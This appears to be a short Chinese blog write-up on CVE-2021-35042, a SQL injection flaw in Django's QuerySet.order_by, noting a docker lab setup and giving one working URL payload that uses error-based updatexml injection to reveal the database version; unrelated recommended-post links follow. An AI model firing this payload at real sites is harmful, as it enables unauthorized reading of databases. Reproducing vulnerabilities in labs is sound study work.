Django QuerySet.order_by SQL注入漏洞(CVE-2021-35042)

漏洞描述

Django 于 2021年7月1日发布了一个安全更新,修复了函数QuerySet.order_by中的 SQL 注入漏洞。

参考链接:

该漏洞需要开发人员使用order_by功能。此外,还可以控制查询集的输入。

漏洞环境及利用

搭建docker环境

payload

/vuln/?order=vuln_collection.name);select%20updatexml(1,%20concat(0x7e,(select%20@@version)),1)%23

相关推荐
双力臂40410 小时前
MyBatis动态SQL进阶:复杂查询与性能优化实战
java·sql·性能优化·mybatis
小石潭记丶10 小时前
Django服务开发镜像构建
django·sqlite·pip
A__tao11 小时前
一键将 SQL 转为 Java 实体类,全面支持 MySQL / PostgreSQL / Oracle!
java·sql·mysql
A__tao12 小时前
SQL 转 Java 实体类工具
java·数据库·sql
华子w90892585914 小时前
基于 Python Django 和 Spark 的电力能耗数据分析系统设计与实现7000字论文实现
python·spark·django
羊小猪~~18 小时前
数据库学习笔记(十七)--触发器的使用
数据库·人工智能·后端·sql·深度学习·mysql·考研
liulun19 小时前
在浏览器中使用SQLite(官方sqlite3.wasm)
数据库·sqlite·wasm
先睡1 天前
优化MySQL查询
数据库·sql